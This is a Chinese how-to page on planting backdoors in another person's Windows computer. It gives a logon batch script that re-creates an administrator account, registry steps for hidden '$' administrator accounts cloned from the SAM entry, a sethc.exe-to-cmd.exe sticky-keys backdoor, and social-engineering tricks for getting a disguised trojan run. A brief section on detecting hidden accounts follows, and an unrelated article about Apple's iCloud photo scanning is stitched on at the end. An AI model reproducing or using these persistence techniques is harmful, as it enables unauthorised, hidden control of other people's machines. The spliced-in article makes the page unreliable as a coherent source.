我有机会经常玩别人电脑,怎么在他的电脑当中留下后门

电脑教程07

我有机会经常玩别人电脑,怎么在他的电脑当中留下后门,第1张

一.建立一个别人永远删不掉的管理员用户操作步骤:

1、在自己电脑里面建立一个.txt文本文件.

2、在里面输入内容

@echo off

net user yixiao 123456 /add 注释:前面yixiao是用户名后面123456是密码

net localgroup administrators yixiao /add

3、把这个文件保存,更改后缀为yixiao.bat 注释:前面名字随便,后面格式一定要是bat

4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\scripts\Logon文件目录下,没有的话自己创建。

完成,下次对方电脑无论如何都有这个管理员帐号,删除了,下次启动还有!

如果把里面的内容改成

@echo off

net user administrator 123456 /add

意思是不管你怎么改,下次启动管理员帐号administrator密码一直是123456。

二.俺认为上述的方法并不理想,可以用隐藏帐号方法来建帐号会更好 。

操作步骤:

1、首先建立一个帐号结尾要带$号 ,如果yixiao$ , 密码自己随便,然后把帐号删除.

2、将以下代码保存成(.reg)注册表形式

代码如下:

——————————————————————————-

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHONE\SAM\SAM\Domains\Account\users\

names\yixiao$]

@=hex(1f4):

——————————————————————————-

说明:1f4是Administrator帐号十六进制的值

3、保存好后导入 ,然后用CMD命令设置密码

net user yixiao$ 123456

这样一个隐形帐号就建立好了,用户在“本地用户和组”内根本无法看到这个帐号。所以也不存在删除帐号。记得千万别在同事的电脑上捣鼓哦,如果被查出来。。。。。嘿嘿:-)

隐藏管理员帐号三分钟搞定

对 regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。 nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE\\SAM\\SAM键下,但是除了系统用户SYSTEM外,其它用户 都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体 步聚如下:

1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$ 1234 /add

2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。

3、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将 administrator加入,并设置权限为“完全控制”。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将 会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。

4、再点“开始”→“运行”并输 入”regedit.exe” 回车,启动注册表编辑器regedit.exe。 打开键:HKEY_LOCAL_MAICHINE\\SAM\\SAM\\Domains\\account\\user\\names [url=file://hacker$/]\\hacker$[/url]”

5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、 1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键”F”的值复制,并覆盖hacker$对应的项 00000409下的键”F”的值,然后再将00000409.reg与hacker.reg合并。

6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del

7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可

8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE\\SAM\\SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。

9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。

那我们管理员又该如何把“隐藏账户”请出系统

隐藏账户的危害可谓十分巨大。因此我们有必要在了解了账户隐藏技术后,再对相应的防范技术作一个了解,把隐藏账户彻底请出系统。

1、添加“$”符号型隐藏账户

对于这类隐藏账户的检测比较简单。一般黑客在利用这种方法建立完隐藏账户后,会把隐藏账户提升为管理员权限。那么我们只需要在“命令提示符”中输入 “net localgroup administrators”就可以让所有的隐藏账户现形。如果嫌麻烦,可以直接打开“计算机管理”进行查看,添加“$”符号的账户是无法在这里隐藏 的。

2、修改注册表型隐藏账户

由于使用这种方法隐藏的账户是不会在“命令提示符”和“计算机管理”中看到的,因此可以到 注册表中删除隐藏账户。来到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”,把这 里存在的账户和“计算机管理”中存在的账户进行比较,多出来的账户就是隐藏账户了。想要删除它也很简单,直接删除以隐藏账户命名的项即可。

3、无法看到名称的隐藏账户

如果黑客制作了一个修改注册表型隐藏账户,在此基础上删除了管理员对注册表的操作权限。那么管理员是无法通过注册表删除隐藏账户的,甚至无法知道黑客建 立的隐藏账户名称。不过世事没有绝对,我们可以借助“组策略”的帮助,让黑客无法通过隐藏账户登陆。点击“开始”→“运行”,输入 “gpedit.msc”运行“组策略”,依次展开“计算机配置”→“Windows 设置”→“安全设置”→“本地策略”→“审核策略”,双击右边的“审核策略更改”,在弹出的设置窗口中勾选“成功”,然后点“确定”。对“审核登陆事件” 和“审核过程追踪”进行相同的设置。

进行登陆审核后,可以对任何账户的登陆操作进行记录,包括隐藏账户,这样我们就可以通过“计算机管理”中 的“事件查看器”准确得知隐藏账户的名称,甚至黑客登陆的时间。即使黑客将所有的登陆日志删除,系统还会记录是哪个账户删除了系统日志,这样黑客的隐藏账 户就暴露无疑了。

得知隐藏账户的名称后就好办了,但是我们仍然不能删除这个隐藏账户,因为我们没有权限。但是我们可以在“命令提示符”中输入“net user 隐藏账户名称 654321”更改这个隐藏账户的密码。这样这个隐藏账户就会失效,黑客无法再用这个隐藏账户登陆。

win2003下创建永远的隐藏帐户操作一、二

前段时间比较流行的一句话”肉机”其实要想控制远端的计算机,那我想就少不了隐藏用户帐号的问题了,其实创建隐藏用户帐号还是比较简单的,现在我就把创建隐藏用户帐号告诉大家。

其实每一个用户帐号在注册表中都有自己帐号数据项

首先我们看看管理员在注册表中的数据项是什么样的

操作一、打开注册表:HKEY_LOCAL_MACHINE\SAM\SAM

SAM是保存用户帐号的地方,不过这个“项”在默认情况下是不可见的。我们如果想看内部的内容就必须首先对其授权。(建议对注册表不是很熟悉的朋友不要随便改动注册表)

操作二、认识注册表中的帐号分类

在OS中的用户帐号无论是内置帐号,还是后建帐号,在注册表中都能看见。不过有两个帐号大家一定要能够认识,那就是管理员帐号和guest帐号。

”000001fa4”表示的是管理员帐号,即使管理员帐号被重命名了这个值也是不会变的,所以我们可以通过这个值来判断,重命名后的管理员帐号。

“000001fa5” 表示的是guest帐号,同样这个值也不会因为,来宾帐号给重命名而改变。剩下的其 它值基本上就是后来创建的用户帐号,生成值了。 认识了注册表后,现在我们就来利用”net user”命令创建帐号了,创建隐藏帐号必须在CMD下。有关常见的命令,这些命令也可以在OS的帮助中找到。

操作三、利用”net user”命令创建帐号

一、先建立隐藏用户 xbx$ 1、net user xbx$ 123,abc /add 这里的意思是说,建立个xbx$ 帐户密码是123,abc

1、C:\Documents and Settings\Administrator>net localgroup administrators xbx$ /add 这里的意思是说把xbx,以便让我们创建用户具备管理员权限。

一、观察注册表中的变化,并对注册表做相应的修改。 HKEY_LOCAL_MACHINE\SAM\SAM

1、找到我们刚刚创建的用户帐号

我们可以看见”000003f6”就是我们刚新建立的”xbx

2、在注册表中多帐号权限复制

找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 这个项,打开”000001f4”项,然后再打开”F”。

然后将这里面的值,全选,粘帖并覆盖到”000003f6”的”F”值.

3、导出注册表值

现在将注册表中的“000001f4”、“000003f6”和“xbx”都导入出来,可直接将Users所有键值都导出来,到文件.

4、删除帐号

接下来我们再次进入“CMD”中删除“xbx

删除帐号后,则注册表中的值也就没有了,这个时候我们再把刚才导出的注册表项,导入到注册表中。 这个时候我们打开“本地计算机用户和组”就看不见“xbx”

先把system32下的sethc.exe删除掉,然后 把cmd.exe改名为sethc.exe就OK了,利用的是5次连续敲击shift的热键功能,下次你3389登陆服务器的时候,就可以利用热键功能打开cmd,从而增加账号,就可以登录服务器了

每一个电脑端口就是一个后门有后门黑客就有可乘之机

电脑后门三种关法

电脑为什么会被“入侵”?首先,我们先来谈谈个人电脑入侵的原理。我们可以把一台已联网的个人电脑当做是一台几乎所有常用端口(Telnet、FTP等)都被封闭的服务器。那么从攻击手段上来讲,常用的端口查询法就失灵了。但是,由于服务器的端口最大可以有65535个,实际上常用的端口才几十个,可以看出未定义端口相当的多。这就表示我们可以采用某种方法定义出一个特殊的端口来达到入侵的目的。为了定义出这个端口,就要依靠某种程序在机器启动之前自动加载到内存,强行控制机器打开那个特殊的端口。这个程序就是“后门”程序。简单的说,我们先通过某种手段在一台个人电脑中植入一个程序,使这台机器变成一台开放性极高(用户拥有极高权限)的FTP服务器,然后就可以达到侵入的目的。

很明显,光有“后门”程序是不够的。一个好的控制工具一般分成两个部分:一个是Client,也就是客户服务程序,我们用它来控制已经打开后门的机器;另一个是Trojan/Host,也就是“后门”程序了,我们用它来开放某台机器。假设我们想控制机器A。那么我们通过一些手段来把“后门”程序传到机器A上并使其运行之,这样A就变成了一台特殊FTP的服务器,然后我们使用Client程序就可以控制A了。

当然了,后门程序如果不运行也就无法发挥作用。因此,我们再来讲讲如何“诱骗”他人使用后门程序。如果是朋友,去他机器那儿偷偷地装上就行了。但是,我们主要的对象是不熟悉的人,那就需要一些方法了。第一,我们先要和他搞好关系,然后就可以问他:“我有一个不错的程序要不要看看?”或者“给你一张我的照片怎么样?”当那个可怜的人说“行呀!给我传过来吧!”我们的第一步就达成了:)。第二步就是伪装术了。简单一些的话是直接把后门程序改名,改成一些常见的名称如ICQNuke、Readme等或者更改后缀,变成TXT或者图片文件格式。这样当他双击这些伪装的程序后就达到了运行的目的了。复杂一些的方法是利用Winzip的SelfExtrator软件把后门程序和一些其它的东西一起制作成一个自解压的压缩包,然后利用设定解压后自动运行Setup程序的功能来运行指定的“后门”程序。这样当他双击自解压程序后,还没等回过味来,程序就已经运行完了。对于高手来说,他们经常会编写一些程序,把“后门”藏在其中。

最后,当你知道了他的IP后,就可以利用客户服务程序去接管目标机器了。

我们已经知道了常用的“诱骗”方法,那么该如何预防后门程序的植入呢?第一,不要随便接受陌生人发来的电子邮件、文件。第二,喜欢聊天的朋友不要轻易暴露自己的IP(大部分人上网的IP都是动态分配的,因此,只要不随便暴露IP,就能较为有效地防止他人入侵)。第三,不要用Windows自带的密码记忆功能来存放你ISP的密码,这种密码保存在Windows/目录下,后缀是PWL的文件中。

如果要问大家选择苹果产品的理由有哪些,相信各位能讨论很久,但安全性一定是共识,并且苹果的一些举措也让用户深信不疑,认为苹果确实为了设备安全做出了很多努力,大多数情况下,我们确实可以这么认为,但近日爆出且被苹果证实的一件事让大家颇为担心,苹果产品安全性是不是已经不再像宣传中的那么牢靠了。

此事之前已经和大家说过多次,就是iOS15中一项新功能可以在未经用户同意情况下扫描iCloud相册,官方解释是保护儿童,如果真有这么个作用,那也确实是好事,可大量用户和媒体却不相信这是苹果添加新功能唯一目的,即便苹果高管三番五次出来解释也无法打消质疑,更有最新消息指出,苹果已经预料到此功能一旦实施后可能带来的后果,预防措施已经开始实行。

据悉,苹果已经在最新下发的备忘录中向所有销售人员提出要求,提醒他们在基于此功能回答用户提问时统一口径,也就是说如果有人不管以任何方式询问苹果客服有关扫描iCloud相册问题时,只会得到一个答复,那就是这项功能扫描检测范围仅限于iCloud中那些可能影响儿童 健康 的图片,苹果绝不会扩大检测范围。

并且苹果还强调不会屈于压力去扫描检测那些和功能要求不相关的图片,在受到质疑的同时,依然想将自己打造一个坚守用户设备安全隐私底线的厂商,希望用户理解苹果在该功能中的一些做法都是合理且必要的,对于那些认为此功能会打开设备后门的人,苹果再三强调无论何时都不会这么做。

可问题是大量用户并不完全认可苹果的解释,很多人认为安全性是苹果设备受用户欢迎的基石,这个口子不管大小都不能开,因为一旦在这方面跨出第一步,后续发展将无法预料,因为既然可以扫描图片,那就证明理论上设备中任何内容都可以被扫描,难道你希望自家开门钥匙掌握在别人手中吗?

并且苹果近日强调该功能首先美国境内使用,也就是说其它国家用户受该功能影响也是早晚的事,再说了,苹果又不是做慈善的,要是尝到了该功能带来的好处,谁敢保证不会说一套做一套呢?

在座各位,你们相信苹果白莲花一般的解释吗?